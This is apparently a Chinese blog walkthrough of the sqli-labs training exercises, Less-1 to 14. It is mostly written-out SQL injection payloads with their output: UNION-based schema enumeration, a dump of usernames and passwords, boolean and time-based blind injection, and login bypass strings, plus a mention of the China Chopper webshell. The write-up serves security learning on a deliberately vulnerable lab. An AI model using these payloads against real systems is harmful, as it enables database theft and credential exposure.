less-1:

1.采用二分法进行猜列:
http://192.236.147.191:30000/Less-1/?id=1' order by 10--+
Welcome    Dhakkan
Unknown column '10' in 'order clause'
//出现错误
2........之后发现该数据只存在三列
http://192.236.147.191:30000/Less-1/?id=1' order by 3--+
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb
3........已知存在三列
采用http://192.236.147.191:30000/Less-1/?id=1' union select 1,2,3--+
//“union”联合的意思,把两次或多次查询结果合并起来
进行回显;发现句子正确数据却没有任何回显信息.......
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb
4.将id=1用“-”注释使“id=1”不被执行
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,3--+
此时发现用户名和密码显示为:
                       Welcome    Dhakkan
Your Login name:2
Your Password:3
 
5.查库:
http://192.236.147.191:30000/Less-1/id=-1' union select 1,2, group_concat(schema_name) from information_schema.schemata--+
Welcome    Dhakkan
Your Login name:2
YourPassword:information_schema,challenges,mysql,performance_schema,security
 
6.查表--表于security:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ //“security”转为16进制
Welcome    Dhakkan
Your Login name:2
Your Password:emails,referers,uagents,users
 
7.查列--列为users:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+//“0x”转换十六进制及将“user”转换为16进制
Welcome    Dhakkan
Your Login name:2
Your Password:id,username,password
破解出该用户的“id”,“usernmae”,“password”
 
8.在“security”取出“username”数据:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(username) from security.users--+
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
 
9.在“security”取出“password”数据:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(password) from security.users--+
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
 
10.同时在“security”取出“username”和“password”的数据:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users--+
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
小结:
1 查库:select schema_name from information_schema.schemata
2 查表: select table_name from information_schema.tables where table_schema='security'
3 查列: select column_name from information_schema.columns where table_name='users'
5 查字段: select username,password from security.users
less-2:
 
步骤同上,把单引号“ ’ ”去除。
最后结果为:
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
 
less-3:
 
在“less-1”的基础上 加上字符括号 “(”
及:“ -1') ”
 
less-4:
 
将“less-3”单引号“ ' ”改为双引号“ " ”
及:“ -1") ”
 
less-5:
盲注型
1、http://192.236.147.191:30000/Less-1/?id=1 回显的结果:
Welcome    Dhakkan
You are in...........
 
2、http://192.236.147.191:30000/Less-5/?id=1' 回显的结果:
Welcome    Dhakkan
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
 
3、查看有多少列:
http://192.236.147.191:30000/Less-5/?id=1' order by 3--+
Welcome    Dhakkan
You are in...........
此时正确返回为:“you are in..........”
 
4、(1)对当前数据库第一个字母进行不断猜解尝试:(题型不同不在是union selcet)
http://192.236.147.191:30000/Less-5/?id=1' and left((select database()),1)='s'--+
正确回显信息:
              Welcome    Dhakkan
You are in...........
表明:猜想正确
猜解出第一位为“ s ”
(2)对当前数据库第二个字母进行不断猜解尝试:
?id=1' and left((select database()),2)='se'--+
————回显正确
猜解出第二位为“ e”
.......
(.)依次猜解可知数据库为“ security ”
 
此方法不不仅慢还不实用
此时运用web渗透的“瑞士军刀”: Burpsuite
运用“Burpsuite”可得数据库为:security
 
less-6:
与第五题一样把单引号换为双引号“ " ”
 
less-7:
运用中国菜刀
 
less-8:
法一:布尔盲注 和第六题一样
法二:
时间延迟盲注:
(1):使用延迟的方法:
http://192.236.147.191:30000/Less-8/
?id=1' and sleep(5)--+
(2): 判断字符长度:
http://192.236.147.191:30000/Less-8/?id=1' and if (length(database())=8,1,sleep(5))--+
当数据库长度为8时数据加载很快,但不为8时加载很慢且延迟为5s左右。
 
 
less-9&less-10:
 
都是时间盲注
 
 
less-11:
Welcome   Dhakkan
Username :    
Password :    
 
1.寻找漏洞:
(1) 在输入admin、admin;显示登陆成功;
 
(2) 均在username输入“ ' ”出现:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and password='' LIMIT 0,1' at line 1
说明“ ' ”存在漏洞
 
(3) 此时注释漏洞:“ admin' # ”
回显登陆成功:
Your Login name:admin
Your Password:admin
 
(4) 舍去admin输入“ ' # ”时出现错误
此时输入“ ' or 1=1 # ”回显登陆成功
 
2、查列:
(1)“ ' or 1=1 order by 2 # ” 回显成功只存在两列
 
(2)“ ' union select 1,2 # ” 回显:
Your Login name:1
Your Password:2
 
3、查库:
(1)“ ' union select 1, database() ”查当前数据库;回显:
Your Login name:1
Your Password:security
数据库为:security
 
(2)“ ' union select 1, group_concat(shcema_name) from information_schema.schemata # ” 查所有数据库:回显:
Your Login name:1
Your Password:information_schema,challenges,mysql,performance_schema,security
 
4、查表于security中:
(1)“ ' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' # ” 在 "security" 查所有表;回显:
Your Login name:1
Your Password:emails,referers,uagents,users
 
5、查列于users中:
“ ' union select 1, group_concat(column_name) from information_schema.columns where table_name='users' # ” 查所有列;回显:
Your Login name:1
Your Password:id,username,password
 
 
6、取出“username” “paasord” 数据:
“ ' union select 1,group_concat(concat_ws('~',username,password)) from security.users # ” 回显:
Your Login name:1
Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
 
 
less-12 :
") #
 
less-13:
 
ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #
 
1、经猜解漏洞为:“ ') # ”
 
2、查数据库
此题不同上题查询库是没有回显,因此采用布尔盲注;
(1) ') or if(length(database())>1,1,sleep(5)) # ——判断数据库长度是否大于1如果是短时间回显,如果不是睡眠5秒后回显;
此时回显成功
..........
') or if(length(database())=8,1,sleep(5)) # ———经猜解数据库长度为8;
 
(2)') or left(database(),1)='s' # ——回显成功,说明数据库首字母为s
第二位:') or left(database(),2)='se' # ——第二位为e;
..........
因此数据库为:“ security ”
 
3、查表
运用burp suite 暴力破解
(1)
ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #
————information..
 
 
less-14:
1、漏洞为:admin'"
2、查库同上:
由burp suite 可查得数据库
 
3、查表:
(1) '" or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='a' # ——表为:uses
.........
 
4、查列:
'" or left((select column_name from information_schema.column where table_name='users' limit 0,1),1)='p' #

sql-labs 1-14的更多相关文章

  1. [SQL基础教程]1-4 SQL 表的创建

    [SQL基础教程]1-4 SQL 表的创建 创建数据库 语法 CREATE DATABASE <数据库名称> // example CREATE DATABASE shop; 创建表 语法 ...

  2. 在论坛中出现的比较难的sql问题:14(存储过程问题 存储过程参数、存储过程内的参数)

    原文:在论坛中出现的比较难的sql问题:14(存储过程问题 存储过程参数.存储过程内的参数) 最近,在论坛中,遇到了不少比较难的sql问题,虽然自己都能解决,但发现过几天后,就记不起来了,也忘记解决的 ...

  3. java web数据库(SQL 2008+IDEA 14)环境配置

    废话少说,在之前已经配置过IDEA+Tomcat的环境之后,现在需要进行数据库配置: 1.首先,SQL SERVER2008数据库的安装 (1)将下载的sqlserver 2008数据库进行解压,点击 ...

  4. SQL Serever学习14——存储过程和触发器

    存储过程 在数据库中很多查询都是大同小异,编写他们费时费力,将他们保存起来,以后执行就很方便了,把SQL语句“封装”起来. 存储过程的概念 存储过程是一组SQL语句集,经过编译存储,可以”一次编译,多 ...

  5. SQL Labs刷题补坑记录(less31-less53)

    LESS31: 双引号直接报错,那么肯定可以报错注入,并且也过滤了一些东西,^异或没有过滤,异或真香 -1" and (if(length(database())=8,1,0)) and & ...

  6. SQL Labs刷题补坑记录(less1-less30)

    补坑加1,这几天快速刷一下sqllabs 来巩固下sql注入基础吧,也算是把很久以前没刷的过一遍,do it! 第一部分: LESS1: 直接报错,有回显的注入, http://localhost/s ...

  7. SQL Labs刷题补坑记录(less54-less65)

    LESS54: 只有10次尝试,dump处secret key 直接union 查就可以,括号为单引号闭合 LESS55: 尝试出来闭合的方式为)括号,后面操作与54相同 LESS56: 尝试出来括号 ...

  8. Mysql常用sql语句(14)- 多表查询

    测试必备的Mysql常用sql语句,每天敲一篇,每次敲三遍,每月一循环,全都可记住!! https://www.cnblogs.com/poloyy/category/1683347.html 前言 ...

  9. sql 视图 按where条件多个字段取一个 分类: SQL Server 2014-12-01 14:09 308人阅读 评论(0) 收藏

    首先介绍一下 Case ..When...Then..End  的用法: CASEJiXiaoFind_RowID  WHEN '1' THENJiXiao_Money1  WHEN '2' THEN ...

  10. SQL ID自增列从1开始重新排序 分类: SQL Server 2014-05-19 14:46 652人阅读 评论(0) 收藏

    数据库中把ID自增长重置成1: 一般做法:(太麻烦) 复制表数据->删除原表.新建一张表->粘贴: 新方法: 数据库中:新建查询->复制.粘贴一下代码->修改表名,执行即可(先 ...

随机推荐

  1. WINDOWS中使用svn

    官网:https://tortoisesvn.net/index.zh.html  (SVN安装包) 然后下载对应的64位安装包(语言包) 安装完后运行 可以存到D盘,新建一个文件夹存放 右键桌面会多 ...

  2. day09 文件属性

    day09 文件属性 昨日回顾 yum底层原理: 第一步:执行yum install nginx安装命令 第二步:yum去/etc/yum.repos.d这个目录中 第三步:根据/etc/yum/re ...

  3. 零基础学习java------37---------mybatis的高级映射(单表查询,多表(一对一,一对多)),逆向工程,Spring(IOC,DI,创建对象,AOP)

    一.  mybatis的高级映射 1  单表,字段不一致 resultType输出映射: 要求查询的字段名(数据库中表格的字段)和对应的java类型的属性名一致,数据可以完成封装映射 如果字段和jav ...

  4. CRLF漏洞浅析

    部分情况下,由于与客户端存在交互,会形成下面的情况 也就是重定向且Location字段可控 如果这个时候,可以向Location字段传点qqgg的东西 形成固定会话 但服务端应该不会存储,因为后端貌似 ...

  5. 转Android service 启动篇之 startForegroundService

    本文转自:https://blog.csdn.net/shift_wwx/article/details/82496447 前言: 在官方文档 Android 8.0 行为变更 中有这样一段话: An ...

  6. 集合类——集合输出、栈和队列及Collections集合

    1.集合输出 在之前我们利用了toString()及get()方法对集合进行了输出,其实那都不是集合的标准输出,集合输出有四种方式:Iterator.ListIterator.Enumeration. ...

  7. springboot热部署与监控

    一.热部署 添加依赖+Ctrl+F9 <dependency> <groupId>org.springframework.boot</groupId> <ar ...

  8. Servlet(2):通过servletContext对象实现数据共享

    一,ServletContext介绍 web容器在启动时,它会为每一个web应用程序都创建一个ServletContext对象,它代表当前web应用 多个Servlet通过ServletContext ...

  9. 第三届“传智杯”全国大学生IT技能大赛(初赛A组)题解

    留念 C - 志愿者 排序..按照题目规则说的排就可以.wa了两发我太菜了qwq #include<bits/stdc++.h> using namespace std; const in ...

  10. Java中的选择结构(二)

    选择结构(二) 学习本章会用到的单词: case:实例,情形,情况 switch:转换,切换,开关 default:系统默认值,违约,预设.缺省 exit:出口,通道,退出 consume:消耗,耗费 ...